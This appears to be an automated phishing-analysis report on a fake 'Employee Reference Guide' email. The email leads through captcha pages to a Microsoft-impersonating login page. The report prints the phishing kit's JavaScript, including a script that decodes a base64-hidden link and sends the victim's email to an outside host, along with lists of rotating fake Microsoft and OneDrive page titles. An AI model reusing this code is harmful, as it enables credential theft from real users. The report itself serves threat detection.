Windows Analysis Report
[External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml

{
    "explanation": [
        "The email claims to require review/signature of an employee document but comes from an unrelated commercial domain (therasage.com)",
        "The subject line contains a suspicious random-looking code (8VM8-WZPT3L-LYH1) typical of phishing attempts",
        "The email includes unnecessary legal disclaimers in multiple languages to appear legitimate"
    ],
    "phishing": true,
    "confidence": 9,
    "generated_by_ai": false
}

{
    "date": "Mon, 23 Dec 2024 10:34:56 -0700", 
    "subject": "[External] 120112 Manual Policies Overview Guide: 8VM8-WZPT3L-LYH1", 
    "communications": [
        "Caution: this message originated from outside the organization.\n\n\n[logo]\n\nEmployee Reference Guide\n\nThe document titled Employee Reference Guide requires your review and signature. Attached is a PDF copy for you to confirm and acknowledge the outlined terms.\n\nPflichtangaben/Mandatory Disclosure Statements:http://www.sap.com/about/legal/impressum.htmlDiese E-Mail kann Betriebs- oder Geschftsgeheimnisse oder sonstige vertrauliche Informationen enthalten. Sollten Sie diese E-Mail irrtmlich erhalten haben, ist Ihnen eine Kenntnisnahme des Inhalts, eine Vervielfltigung oder Weitergabe der E-Mail ausdrcklich untersagt. Bitte benachrichtigen Sie uns und vernichten Sie die empfangene E-Mail. Vielen Dank.This e-mail may contain trade secrets or privileged, undisclosed, or otherwise confidential information. If you have received this e-mail in error, you are hereby notified that any review, copying, or distribution of it is strictly prohibited. Please inform us immediately and destroy the original transmittal. Thank you for your cooperation.\n"
    ], 
    "from": "orders@therasage.com", 
    "to": "ppuhl@biolegend.com", 
    "attachements": []
}

{
  "contains_trigger_text": true,
  "trigger_text": "Employee Reference Guide",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{"classification":"Credential Stealer"}

Email:
Detected potential phishing email: The email claims to require review/signature of an employee document but comes from an unrelated commercial domain (therasage.com). The subject line contains a suspicious random-looking code (8VM8-WZPT3L-LYH1) typical of phishing attempts. The email includes unnecessary legal disclaimers in multiple languages to appear legitimate

{
    "risk_score": 6,
    "reasoning": "The script demonstrates moderate-risk behavior by redirecting the user to an unfamiliar domain without transparency. While the use of reCAPTCHA suggests a legitimate purpose, the lack of context around the redirect URL raises concerns and requires further investigation."
}

        // Callback function when reCAPTCHA is successfully completed
        function onSuccess() {
            document.getElementById('submit-button').style.display = 'block'; // Show the button
        }

        // Function to handle form submission and redirect
        function submitForm() {
            // Redirect the user to a specific URL
            window.location.href = "https://pub-cb48a1f3508c49e29943cfa5c56fda5c.r2.dev/gteuiwopqvsfsf";
        }

        // Optional: Callback for when the reCAPTCHA expires
        function onExpire() {
            document.getElementById('submit-button').style.display = 'none'; // Hide the button
        }
    

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have a legitimate purpose, such as reCAPTCHA integration, the aggressive and opaque nature of the implementation raises significant security concerns. Further investigation is recommended to determine the true intent and potential impact of this script."
}

      recaptcha.anchor.Main.init("[\x22ainput\x22,[\x22bgdata\x22,\x22Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy85N3V6Z0h4emRxWGVmbVRnOHdQZUtDeTRrbGE4NnE0emhqMm5xX3lpZHcwLmpz\x22,\x22\x22,\x22Y1VaMHJQMDN5UzlnY09tVFhmc0dWcmtJM0tjWVNld1lVYTZvbTFYOXIrQUFDNm1JT2haMXRkbGtEZjByUjhkb2Z1aFFaYmlwNlZXbHlrRW0wdEpDVFM2Q2JKT2xPWjVOSWxjWWhiU1JZY2xwQ3BFajJSR0l2TGNSVjRVMTdBNWVWQllvemJBQnFMSUozZzhUK0swZWxKREsyQW9ybDhNTDg5cHdxUkVVMmxLZFRqcFFkTW9PcFlRditrZzhhbHpCdXI1R2t0K3NYUGJkSDhOV1J6MDJLQ1JmZmZ1RGd2bFMzNnhNbHpzTlJSbU80MGZtMWRDUDJ4S0FQSlFLYmh5bjNHeUY4YnlWZHpkVWVod3kzcHJlWUpvaTFVYW5ncWR1d2huTE9IbUxUWEpocENVbmozY2s4cUVnaFdyaTU0YWE5ZDloUnVVaVZ3SXJvVDMweFpidC8wWE5QWHFwR3lHK3g0K0dzNlhwOVNEUW04bXVLb29ubGtQTUVONEZKWENJN0RzZTlSd3hnRGt6cER0QnpDTU1uTjJYVmVqUW1nWHVFTkY4VDk5eFM1NUFXU2ZkNnNJaStSQytLSFpQZ1ltVUJVN2QrOHBEQkN6eVY5TXpLNkhPcG5vUTNTZWtOOXhIZS9BOG81MXpiNDhEZ3pOY2l4RGoxVlBhSlFqWW9YNU1XaUJ6SXBhK05WbzVUMUk4OHpJSUxreHRoTjdGMERnMGFuQk1xVHQrODRaLytEY28rNzU3cnNzUDlnSVJIeTdBZzF0OVlxVGZHT1hQeXc5b2c2eGVjSXNKZjVYT0VUOGVTTWlyMGNWREMrV1AxWlJtWWVCWjArTUVWUmNwU0pIM280cEd1RGxTTElrSXBPTmVGRjIrVURSV1Njbkh5YW9sTU5LYkZzVnZJcmVibEpwMGdZQlk4eXhNUkE0RFhtNlN4UmJNeVIzNDZjV1FtSzBBTTlUaUdhVWx6by9NeHpaRkJzczBhRC9rZW1udXl3NFdCV0FmdGQraWF2d053bEtQcE9FZEdPM2VrcHh0S0F5VUNCV1FRU0tRcW9KRWZHcEp2R2hwN1FFN2ZwU2VZc1M5V1FKdkJDU2xEdlJqVFdubkpMQm5vRE5tRzlxK3BaTzk0QlI5OTIrQnFpeUI5TVhmaWxmVy9ybm1jRU1SeDZCRkpUdmwxdkFleXA2TnEvUGxacU9xZ0labXpLOXZGMHBiSWQ4RmF5UTYyb2VPUmhpSnFHYzIrY0dxQWJRVi9vS1ZvNkJNb0wvL0JiYk12cWZEZ1FNQWFRV01pbnN2L3EySnJMK2tZOTlMMjVwU3hQOFhZVHBRUi9Zb0JVMk9Ic1NBbWZkcDNZTERNR0IwNkpwdHQ0WjEyTDdQZVBzSEpsQU1kNzFoNTN5ZmRnWVlpaTdwT3FmdGl0YllhME1BQ0FLVlY1UFhUcVhsU1FFVmV3RmxyaVlUNkNCNi84VkpGbFE4WnVwd1YyZmVRczVGc3pBTHduMXhsNnZ1Zm45djYveUdDS3R5UDNJcndKazVwbDNDYklRQXFLTSs5VGFzNGsrVFUwRUx3WnZQU0Z1dGxEM1JJZXo1QUdqTzR0UDUrRldzRC9qOFpPZW1SR3dBVC9sWXFtd0R0WmtmMnp1QW5hSWJ6TnNLMDJ0L2lCNnlONVVhVm5SMkFYQVA3YXFuSjJhOFdtdG5DMVlkVFNySmRzU1dvYk83Ukc4VzZESm9ZWW5Fdmlvc0VDSXpFRmF0UlVPL0NucU5DOTBVQ2VjeElQNTd3eHVZYlkvbGRQdmlsbDFsNXRSenREcUIxbkNqNlRTRW9tanVIcldpTHBjWVg3YmR3cWhCNE9jTjBmZE9iTHpuR3RjcTZ5c0NFMHp1U0Q0elNpdkJyRnRxemx0NVNMa1BIM24rZGE5bE0yVUprdDh2dUxOUzlHaXJWL3J5NHJjMHdmRHFxdFpPQjVIU0ZvbktsTG0ycUZVMExHYVpEMGV4RjlPdXJGUThmeUc3RjdTeS8yanUvMUVuM1BpZGV3QXROUklxMW5HZGhvOWducU1oR1YyS0JGZVV4a25ZV3I3UHpKSTBrd2E0V1NxUWg3cm5SUVhnNEpZVC9IUk9NZ2VQWXBtRW0zS21kTjFTUm85cVhEVFNCcHBZZ1haKzQ3WGFpWkhVN1FEOG45Qko3L0t3WW5jeVVabitXRDlsOXBOUHp3eWlJSjFac2Q2VnhMRkV2d242NHRXbDVjSGhLM0JxMTZSN21ZbEdYOHZPbWJJcmY3WVg3ejFZUFd6Z2JHM0lndXo1LzJ5NGRhb2hHOVNralhPd2JaWXhCUUdOdmRVL1VjVDlPTDhWZGNjMUJBOVNXbWRFQ3A1ZFR1blZBRjZ5b1NGNElzRUZEbFhJOVFWb3gzdkpRMVVpai9Ua0dPVVlDYy9mTWNwZC9XNXJNM1JCZFZqNkwzTk4raXQzWnJ6Uk50SVBvSnhpNDYxa2txL3ptRlR0ODB6UHg0TmN2TFB2QnB4bXRwdWhJSXV4b0tKVU4zcS9PZkhnazYySzNoSzFIY0d1Q0hoeElHQlBrQllvbHVTL01EbEhFL055YkZYb1hVMTc4Zm1xNG4wSVkzVVh4bDd1NDNZTUl3OEp3eklDbm5LUjdxMmVMUTJaemlENUl3WHpGSEdNWXpFOTZGTy9hZnAyNVZiOWFxQTBPU0ZVSVhwczNmKzAzZmVuTURVeHBOUVJFcUtjZ29PVUUvUmNUZEhmeUNLVGhUMUlJazZrT08vU1NSUVhieE9UWTIvU0dtNE4ydjRRdW5pdDd1SG5KUi9QdEJyZmdKS0xPdDIra3FmbVNaelduemNuZE4wMzVzZ2tVRUlYajdEMVpYQXpBL2Y5dWpYTW5hckZSeW1qMGQ5eHRvYzE0L2F1dW1meGY3ZkdyVnR5NHlXQWE3N01LcTdIMUo3UlNPaFZ6SlI0U1RHMUgvUmZPQ2JRZTdQT3hCczRMdjRDQ3dVMFc0NVZ4YTB2Zkg1Rzhxc2hDa3RGczhrZW9CWkdxWkJkUDZmK2JRQU1SajJ5bElhVklydjFWM3EyTFF2OUZNSEF6Vms2WDg2b3JYTEtidlJsK2xmUmsyTzFWQmVWcjBRUmllaWowaklnZEZUMXloenBrS2NKbGJVTDc5UU5zSFRhcm83cytEWkZscjdlOEczS2Y5RXBPMWRjczVkZVRETnV6aHJHMUxORUNpaFd6bFpzbEdmNDI2aUE1ZG1IaXA2UE9iaXpZUnF1akcxMGdhRExZZ0YwV3hFcllCWGx6dlJiVU11azNiUkhXeXF6R1A4dVpmT3RRS1I5RGVtVzVaOTMwSjlpNnEwaXNmOVQ4S3oraHFYV3dDa0l4M1VsVjBkS1lJeGQzV1BERVo1YndoNHZjRDNyY0J3dGEwblRjMlNGaFpRZTl6cDU3aHM0aDNGc3BNWkdyZ1hZRDlMOUs1bkZjQlBqeTVrbmlZdk45bEg2MVd0bjE2Z21VaUM1aE9wcEI0SjRybUxKTmxTV2YvYkkxU21tR2JIaHB3cU45K09tL1NRcFNhelM2QWZTM05vdC8wOTVUVjRCMVpPRk56VzlzU0N0Z0tjKy9sOW1hYUs3bWZIZG9WbHVvYWVCbmNneHNCc2ZFOWpHZHNORVhGN1BFcFgzQTBSVndpYTl3Y1Y1U3hhSGVCKzlNVmdjcjNHSnFZVDIvSmJ3MjR2emVnZnJzMGdkYWdVZVdZcU43TXpVa1FwVE95a1hyOUVyc05aRWhDRWNjUWZkdmFIMXVKc2RsVnJLN29aYll4empDeDNmZ3plVURVQkZHSVdJK2pERDdlR2Q4V0V

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a combination of obfuscated code and legitimate functionality. While it contains some potentially high-risk indicators like dynamic code execution and data exfiltration, the overall context suggests it may be a part of a larger, legitimate application. The code seems to be using the Trusted Types API to sanitize dynamic code execution, which reduces the risk. Additionally, the presence of analytics-related functionality and the lack of clear malicious intent indicate a medium-risk profile. Further investigation may be required to fully understand the purpose and potential impact of this script."
}

/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var l=function(Q,A){if(A=(Q=null,h).trustedTypes,!A||!A.createPolicy)return Q;try{Q=A.createPolicy("bg",{createHTML:F,createScript:F,createScriptURL:F})}catch(n){h.console&&h.console.error(n.message)}return Q},F=function(Q){return Q},h=this||self;(0,eval)(function(Q,A){return(A=l())&&Q.eval(A.createScript("1"))===1?function(n){return A.createScript(n)}:function(n){return""+n}}(h)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',
'',
' Copyright Google LLC',
' SPDX-License-Identifier: Apache-2.0',
'*/',
'var Q4=function(Q,A,h,n,t){for(h=(n=h[t=0,3]|0,h[2]|0);t<16;t++)Q=Q>>>8|Q<<24,Q+=A|0,Q^=h+1634,A=A<<3|A>>>29,n=n>>>8|n<<24,n+=h|0,n^=t+1634,A^=Q,h=h<<3|h>>>29,h^=n;return[A>>>24&255,A>>>16&255,A>>>8&255,A>>>0&255,Q>>>24&255,Q>>>16&255,Q>>>8&255,Q>>>0&255]},A3=function(Q,A){return(A=N(Q),A)&128&&(A=A&127|N(Q)<<7),A},FM=function(Q,A,h,n,t){function l(){}return{invoke:function(p,d,e,F){function B(){n(function(w){h3(function(){p(w)})},e)}if(!d)return d=t(e),p&&p(d),d;n?B():(F=l,l=function(){h3((F(),B))})},pe:(h=(Q=nj((n=void 0,Q),function(p){l&&(A&&h3(A),n=p,l(),l=void 0)},!!A),t=Q[0],Q[1]),function(p){h&&h(p)})}},X=function(Q,A,h,n,t,l,p,d){if(!Q.Or&&(p=void 0,h&&h[0]===x&&(p=h[2],A=h[1],h=void 0),d=O(145,Q),d.length==0&&(t=O(54,Q)>>3,d.push(A,t>>8&255,t&255),p!=void 0&&d.push(p&255)),A="",h&&(h.message&&(A+=h.message),h.stack&&(A+=":"+h.stack)),h=O(87,Q),h[0]>3)){h=(A=l9((h[0]-=(A=A.slice(0,(h[0]|0)-3),A.length|0)+3,A)),Q).F,Q.F=Q;try{Q.Lo?(n=(n=O(146,Q))&&n[n.length-1]||95,(l=O(416,Q))&&l[l.length-1]==n||v(416,[n&255],Q)):v(146,[95],Q),v(222,T(A.length,2).concat(A),Q,9)}finally{Q.F=h}}},se=function(Q,A,h,n){for(h=(n=Y(Q),0);A>0;A--)h=h<<8|N(Q);S(n,Q,h)},N=function(Q){return Q.v?Bj(Q,Q.H):y(Q,true,8)},t3=function(Q,A,h,n,t){v(((h=(n=Y((A&=(t=A&3,4),h=Y(Q),Q)),O(h,Q)),A)&&(h=l9(""+h)),t&&v(n,T(h.length,2),Q),n),h,Q)},Y=function(Q,A){if(Q.v)return Bj(Q,Q.H);return(A=y(Q,true,8),A)&128&&(A^=128,Q=y(Q,true,2),A=(A<<2)+(Q|0)),A},rC=function(Q,A,h,n,t){if((t=Q[0],t)==wC)A.R=true,A.vL=25,A.V(Q);else if(t==P){h=Q[1];try{n=A.s||A.V(Q)}catch(l){M(A,l),n=A.s}h((Q=A.S(),n)),A.P+=A.S()-Q}else if(t==Ue)Q[3]&&(A.u=true),Q[4]&&(A.R=true),A.V(Q);else if(t==pj)A.u=true,A.V(Q);else if(t==NF){try{for(n=0;n<A.j.length;n++)try{h=A.j[n],h[0][h[1]](h[2])}catch(l){}}catch(l){}((0,Q[1])(function(l,p){A.Sn(l,true,p)},function(l){c([dC],(l=!A.Z.length,A)),l&&q(A,true,false)},function(l){return A.sr(l)},(n=(A.j=[],A.S()),function(l,p){return A.Ko(l,p)})),A).P+=A.S()-n}else{if(t==xC)return n=Q[2],S(133,A,Q[6]),S(331,A,n),A.V(Q);t==dC?(A.l=[],A.I7=[],A.I=null):t==et&&E.document.readyState==="loading"&&(A.U=function(l,p){function d(){p||(p=true,l())}E.document.addEventListener("DOMContentLoaded",(p=false,d),z),E.addEventListener("load",d,z)})}},u9=function(Q,A,h){return(h=b[A.N](A.AN),h)[A.N]=function(){return Q},h.concat=function(n){Q=n},h},I,Bj=function(Q,A){return A=A.create().shift(),Q.v.create().length||Q.H.create().length||(Q.v=void 0,Q.H=void 0),A},G=function(Q,A,h){Q[S(h,A,Q),et]=2796},vj=function(Q,A,h,n,t,l,p,d){return(t=(d=h&7,A=[11,(p=Cj,-5),56,53,-24,-93,A,9,98,14],b[Q.N](Q.no)),t)[Q.N]=function(e){l=e,d+=6+7*h,d&=7},t.concat=function(e){return e=(e=(e=n%16+1,2886*l+4*n*n*e-e*l+A[d+67&7]*n*e+(p()|0)*e)-148*n*n*l- -185*n*l+d+37*l*l,l=void 0,A[e]),A[(d+53&7)+(h&2)]=e,A[d+(h&2)]=-5,e},t},Tl=function(Q,A,h){if(Q.length==3){for(h=0;h<3;h++)A[h]+=Q[h];for(Q=[13,8,13,12,16,5,3,10,15],h=0;h<9;h++)A[3](A,h%3,Q[h])}},i9=function(Q,A,h,n,t,l){if(!A.s){A.Y++;try{for(l=(h=A.B,n=void 0,0);--Q;)try{if(t=void 0,A.v)n=Bj(A,A.v);else{if(l=O(52,A),l>=h)break;n=O((S(54,A,l),t=Y(A),t),A)}n&&n[dC]&2048?n(A,Q):X(A,0,[x,21,t]),Z(Q,false,false,A)}catch(p){O(1,A)?X(A,22,p):S(1,A,p)}if(!Q){if(A.HL){i9(128011727466,(A.Y--,A));return}X(A,0,[x,33])}}catch(p){try{X(A,22,p)}catch(d){M(A,d)}}A.Y--}},XM=function(Q,A,h,n){return O(331,(S(52,(i9(Q,((n=O(52,h),h.l)&&n<h.B?(S(52,h,

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: http://elysiumproperties.net

{
  "contains_trigger_text": true,
  "trigger_text": "Please complete the CAPTCHA",
  "prominent_button_name": "I'm not a robot",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": true,
  "trigger_text": "complete the CAPTCHA",
  "prominent_button_name": "I'm not a robot",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "VERIFY",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Verify",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
    "risk_score": 6,
    "reasoning": "The script demonstrates some moderate-risk behaviors, such as redirecting the user to a decoded Base64 URL that includes the user's email address. While the script appears to have a legitimate purpose (accessing a document portal), the way it handles the user's email address and the use of obfuscated links raise some concerns. Further review may be necessary to determine the true intent of the script."
}

        document.getElementById('continue-button').addEventListener('click', function () {
            continueLoading();
        });

        document.getElementById('THEGODOFTHELIVING-input').addEventListener('keydown', function (event) {
            if (event.key === 'Enter') {
                continueLoading();
            }
        });

        function continueLoading() {
            var THEGODOFTHELIVING = document.getElementById('THEGODOFTHELIVING-input').value;
            if (validateEmail(THEGODOFTHELIVING)) {
                var linkx = "aHR0cHM6Ly96b296LWpvLmNvbS90ZXlnc3llLw=="; // Base64 encoded link
                var decodedLink = atob(linkx);
                var finalLink = decodedLink + "#" + THEGODOFTHELIVING;  // Directly append the email address
                window.location.href = finalLink;
            } else {
                alert("Please enter a valid office 365 email address.");
            }
        }

        function validateEmail(email) {
            var re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return re.test(email);
        }

        function getRandomTitle() {
            const titles = [
                "Encrypted Document",
                "OneDrive Portal",
                "Private Document",
                "Secure File Documents",
                "Document Access"
            ];
            return titles[Math.floor(Math.random() * titles.length)];
        }

        function getRandomHeader() {
            const headers = [
                "Microsoft Excel",
				"Secure Document Access",
                "Confidential File Portal",
                "Private Document Repository",
                "Secure File Gateway",
                "Document Access Hub",
                "Excel Drive",
                "Excel",
                "Excel Box",
                "Access document-repository",
                "SharePoint"
            ];
            return headers[Math.floor(Math.random() * headers.length)];
        }

        window.onload = () => {
            document.title = getRandomTitle();
            document.getElementById('header-title').innerText = getRandomHeader();
        };
    

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Submit Captcha to proceed",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Submit Captcha to proceed",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
"contains_trigger_text": true,
"trigger_text": "Verify Your Identity",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Enter your Microsoft email"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://pub-cb48a1f3508c49e29943cfa5c56fda5c.r2.dev

{
  "brands": "unknown"
}

{
"contains_trigger_text": true,
"trigger_text": "Verify Your Identity",
"prominent_button_name": "Next",
"text_input_field_labels": "Enter your Microsoft email",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "brands": [
    "Microsoft"
  ]
}

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is classified as 'wellknown'.",    "The URL 'pub-cb48a1f3508c49e29943cfa5c56fda5c.r2.dev' does not match the legitimate domain 'microsoft.com'.",    "The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain.",    "The presence of a Microsoft-related input field on a non-Microsoft domain is suspicious and indicative of phishing."  ],  "riskscore": 9}
Google indexed: False

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The provided URL 'pub-cb48a1f3508c49e29943cfa5c56fda5c.r2.dev' does not match the legitimate domain 'microsoft.com'.",    "The URL contains a random string and uses the 'r2.dev' domain, which is not associated with Microsoft.",    "The presence of a random string and an unusual domain extension is a common tactic in phishing attempts.",    "The input field requests a Microsoft email, which could be used to harvest credentials."  ],  "riskscore": 9}
Google indexed: False